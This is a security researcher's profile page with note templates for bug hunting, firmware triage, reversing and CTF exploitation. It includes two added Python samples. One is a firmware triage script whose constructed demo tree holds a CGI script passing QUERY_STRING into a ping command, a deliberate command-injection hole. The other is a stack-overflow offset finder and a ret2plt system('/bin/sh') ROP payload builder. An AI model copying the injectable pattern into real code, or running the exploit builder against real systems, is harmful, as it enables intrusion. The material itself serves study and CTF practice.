sondt / nosiaht

Hey, I'm sondt, also known as nosiaht.

IoT security research / bug hunting / CVEs / reversing / pwn

I hunt bugs, publish CVEs, work in (IoT) security research, and enjoy CTFs focused on Reverse Engineering and Binary Exploitation.

This page is intentionally plain: text first, no animation, no JavaScript, no tracking script, no decorative noise.

+------------------+---------------------------+
| handle           | sondt / nosiaht           |
| domain           | IoT security research     |
| real-world work  | bug hunting, CVEs         |
| favorite puzzles | reversing, pwn            |
| page rule        | text survives everything  |
+------------------+---------------------------+

Now

Bug hunting lane
Looking for real bugs in real targets, turning fragile behavior into clear reports, repro steps, impact, and CVEs.
Research lane
Firmware internals, embedded services, web handlers, and weird implementation details in small devices.
CTF lane
Reverse the logic, understand the memory, write the exploit only after the model is clear.
Writing lane
Short notes with enough commands, offsets, assumptions, and proof for another person to reproduce the path.

Samples

CVE / bug hunting note

Input: product behavior / Output: report skeleton

target:      vendor-device-web-ui
surface:     authenticated handler, config import path
bug shape:   unsanitized input reaches privileged command wrapper
impact:      command execution in device context
proof:       minimal payload, logs, version, affected endpoint
next:        reduce noise, write clean repro, verify patched build

IoT firmware map

Input: firmware image / Output: quick research map

target: router-firmware.bin
extract: binwalk -> squashfs-root
first:  init scripts, web root, default config, exposed services
watch:  hardcoded secrets, command wrappers, writable paths
next:   map service entrypoints before forming exploit ideas
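As an added example (not part of this page), a small Python pass over an already-extracted root that mechanizes the "first" and "watch" lines above: it lists init scripts and the daemons they start, the web root, default config files, likely hardcoded secrets and private keys, scripts where CGI request data or eval can reach a command line, and world-writable directories. It assumes extraction already happened (binwalk -e router-firmware.bin gives the squashfs-root) and builds a constructed sample tree for the demo; every regex is a heuristic that points a human at a file, not proof of a bug.

```python
"""First-look triage of an extracted firmware root (binwalk's squashfs-root).

Added example, not part of the original page. Assumes extraction already
happened (binwalk -e router-firmware.bin) and that `root` is the extracted
tree; build_sample_root() constructs a small fake tree for the demo. The
regexes are heuristics that point a reader at files, not proof of a bug.
"""
import os
import re
import stat
import tempfile

INIT_PATHS = ("etc/init.d/", "etc/rc.d/", "etc/inittab", "etc/rcS", "etc/rc.local")
WEB_ROOTS = ("www", "htdocs", "web", "var/www", "usr/www")
CONFIG_DIRS = ("etc", "etc/config", "etc/default", "etc/defaults")
CONFIG_EXT = (".cfg", ".conf", ".ini", ".xml", ".json")
# Daemons that usually listen on the network once an init script starts them.
SERVICE_RE = re.compile(r"\b(telnetd|utelnetd|httpd|uhttpd|lighttpd|boa|mini_httpd|"
                        r"dropbear|sshd|upnpd|miniupnpd|ftpd|tftpd|snmpd|dnsmasq)\b")
# key=value / key: value credential shapes, plus PEM private keys.
SECRET_RE = re.compile(r"(?i)(passw(or)?d|secret|token|api[_-]?key|private[_-]?key)\s*[=:]\s*\S+")
PEM_RE = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
# Shell/CGI scripts where request data or eval can reach a command line.
WRAPPER_RE = re.compile(r"\beval\b|\$\{?(QUERY_STRING|REQUEST_URI|PATH_INFO|CONTENT_LENGTH|HTTP_[A-Z_]+)\b")


def _read_text(path, limit=256 * 1024):
    """Read the head of a file as text; ELF binaries decode with replacement chars."""
    try:
        with open(path, "rb") as f:
            return f.read(limit).decode("utf-8", "replace")
    except OSError:
        return ""


def triage(root):
    """Walk `root` and collect the 'first' and 'watch' items from the note."""
    found = {k: [] for k in ("init_scripts", "exposed_services", "web_root",
                             "default_config", "hardcoded_secrets",
                             "command_wrappers", "writable_paths")}
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        rel_dir = "" if rel_dir == "." else rel_dir
        mode = os.lstat(dirpath).st_mode
        # World-writable directory without the sticky bit: anything on the box can drop files there.
        if rel_dir and (mode & stat.S_IWOTH) and not (mode & stat.S_ISVTX):
            found["writable_paths"].append(rel_dir)
        if rel_dir in WEB_ROOTS:
            found["web_root"].append(rel_dir)
        for name in files:
            rel = f"{rel_dir}/{name}" if rel_dir else name
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue  # squashfs symlinks often point into the live rootfs, not the image
            text = _read_text(path)
            if rel.startswith(INIT_PATHS):
                found["init_scripts"].append(rel)
                for m in SERVICE_RE.finditer(text):
                    if m.group(1) not in found["exposed_services"]:
                        found["exposed_services"].append(m.group(1))
            if rel_dir in CONFIG_DIRS and (name.endswith(CONFIG_EXT) or "default" in name):
                found["default_config"].append(rel)
            if SECRET_RE.search(text) or PEM_RE.search(text):
                found["hardcoded_secrets"].append(rel)
            is_script = text.startswith("#!") or name.endswith((".sh", ".cgi"))
            if is_script and WRAPPER_RE.search(text):
                found["command_wrappers"].append(rel)
    for v in found.values():
        v.sort()  # os.walk order is filesystem-dependent; sort for stable reports
    return found


def build_sample_root(base):
    """Constructed tree shaped like a small router image (demo data, not a real device)."""
    files = {
        "etc/inittab": "::sysinit:/etc/init.d/rcS\n::respawn:/sbin/getty 115200 ttyS0\n",
        "etc/init.d/rcS": "#!/bin/sh\nmount -t proc proc /proc\ntelnetd -l /bin/login &\nhttpd -h /www -p 80 &\n",
        "etc/config/default.cfg": "admin_user=admin\nadmin_password=admin\nwifi_ssid=Router\n",
        "etc/passwd": "root:x:0:0:root:/root:/bin/sh\n",
        "www/index.html": '<html><form><input name="password"></form></html>\n',
        "www/cgi-bin/config.cgi": "#!/bin/sh\nHOST=$(echo \"$QUERY_STRING\" | sed 's/.*host=//')\nping -c 1 $HOST\n",
        "usr/share/keys/server.pem": "-----BEGIN RSA PRIVATE KEY-----\nCONSTRUCTED-KEY-BODY\n-----END RSA PRIVATE KEY-----\n",
        "tmp/.keep": "",
    }
    for rel, content in files.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(content)
    for dirpath, _dirs, _files in os.walk(base):
        os.chmod(dirpath, 0o755)  # pin modes so the demo does not depend on the host umask
    os.chmod(os.path.join(base, "tmp"), 0o777)  # world-writable, no sticky bit
    return base


def demo():
    """Build the constructed sample tree in a temp dir and triage it."""
    return triage(build_sample_root(tempfile.mkdtemp(prefix="squashfs-root-")))


if __name__ == "__main__":
    import json
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_root(tempfile.mkdtemp())
    print(json.dumps(triage(root), indent=2))
```

Run it as `python3 triage.py squashfs-root` against a real extraction; with no argument it triages the constructed tree. The output is the research map, not the finding: config.cgi shows up because QUERY_STRING feeds a command line, and whether that is exploitable is what the next step (mapping the service entrypoint and reading the handler) decides.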

Reverse engineering scratchpad

Input: function cluster / Output: working hypothesis

function: sub_4018F0
role:     likely input parser
signals:  bounds check nearby, string table references, error-code caller
risk:     first names are often wrong
next:     rename by data flow, not by vibes

Binary exploitation note

Input: CTF binary / Output: exploit direction

binary:      chall
protections: NX enabled, PIE disabled, partial RELRO
bug class:   stack overflow candidate
plan:        find offset -> control RIP -> build ROP
next:        keep exact commands, offsets, libc, and payload shape
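As an added example (not from this page or any particular challenge), the "find offset -> control RIP" steps of that plan in Python: a De Bruijn pattern so that whatever 4 bytes land in a register or on the stack give the offset in a single lookup, then the payload shape that places a chain where the saved return address was. The binary, the 8 bytes "read at RSP" in the demo, and the gadget and PLT addresses are all hypothetical placeholders for a non-PIE, NX-enabled x86-64 target.

```python
"""Offset finding and payload shape for a stack overflow (find offset -> control RIP).

Added example, not from the original page or any specific challenge. Target
assumptions: x86-64, NX on, PIE off, partial RELRO. All addresses below are
hypothetical placeholders; in a real note they come from ROPgadget/ropper,
readelf, and the known or leaked libc base.
"""
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
SUBSEQ = 4  # every 4-byte window of the pattern is unique, so 4 bytes pin an offset


def de_bruijn(alphabet=ALPHABET, n=SUBSEQ):
    """De Bruijn sequence B(k, n): each length-n window over k symbols occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(alphabet[i] for i in a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)


_PATTERN = de_bruijn()  # 26**4 bytes, generated once at import


def cyclic(length):
    """First `length` bytes of the pattern: the junk sent to overflow the buffer."""
    if length > len(_PATTERN):
        raise ValueError("pattern exhausted; raise SUBSEQ or widen the alphabet")
    return _PATTERN[:length]


def cyclic_find(value):
    """Offset of the pattern bytes that landed in a register or on the stack.

    On x86-64 a non-canonical return address faults at the `ret` itself, so RIP
    still points at the ret; read the 8 bytes at RSP instead. On 32-bit targets
    EIP holds the value directly. The first 4 bytes of either are enough.
    """
    if isinstance(value, int):
        value = struct.pack("<Q", value)
    return _PATTERN.index(value[:SUBSEQ])


def p64(x):
    return struct.pack("<Q", x)


def build_payload(offset, chain):
    """Padding up to the saved return address, then the chain one qword at a time."""
    return b"A" * offset + b"".join(p64(g) for g in chain)


# Hypothetical addresses for a non-PIE binary (placeholders, not a real target).
RET = 0x40101A        # ret: extra 8-byte shift so RSP is 16-byte aligned when system() runs
POP_RDI = 0x401263    # pop rdi ; ret
BINSH = 0x402010      # "/bin/sh" in .rodata
SYSTEM = 0x401060     # system@plt


def system_binsh_chain():
    """ret2plt chain for system("/bin/sh") with the alignment ret in front."""
    return [RET, POP_RDI, BINSH, SYSTEM]


def demo():
    """Step 1: crash with cyclic junk, read RSP in gdb. Step 2: put the chain there."""
    at_rsp = b"saaataaa"  # constructed: the 8 bytes gdb showed at RSP after the fault
    offset = cyclic_find(at_rsp)
    payload = build_payload(offset, system_binsh_chain())
    return offset, payload


if __name__ == "__main__":
    off, pl = demo()
    print("offset:", off)
    print("payload:", pl.hex())
```

The alignment `ret` at the head of the chain is the caveat that costs the most time in practice: system() on x86-64 glibc uses `movaps` on the stack and crashes with a misaligned RSP, so the chain needs one extra 8-byte shift when the return address lands at an odd alignment. Everything else in the note's "next" line (exact commands, offsets, libc version, payload shape) is what `demo()` prints and what a reproducible writeup records verbatim.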

Note rules

  1. Show the artifact, target version, and affected surface first.
  2. Separate observed facts from guesses.
  3. Keep commands, offsets, payloads, and logs exact.
  4. Explain impact without hype.
  5. Prefer small reproducible samples over long vague explanations.

Contact

Email: [email protected]

GitHub: github.com/sondt99

Social: x.com/_sondt_

Telegram: t.me/sondt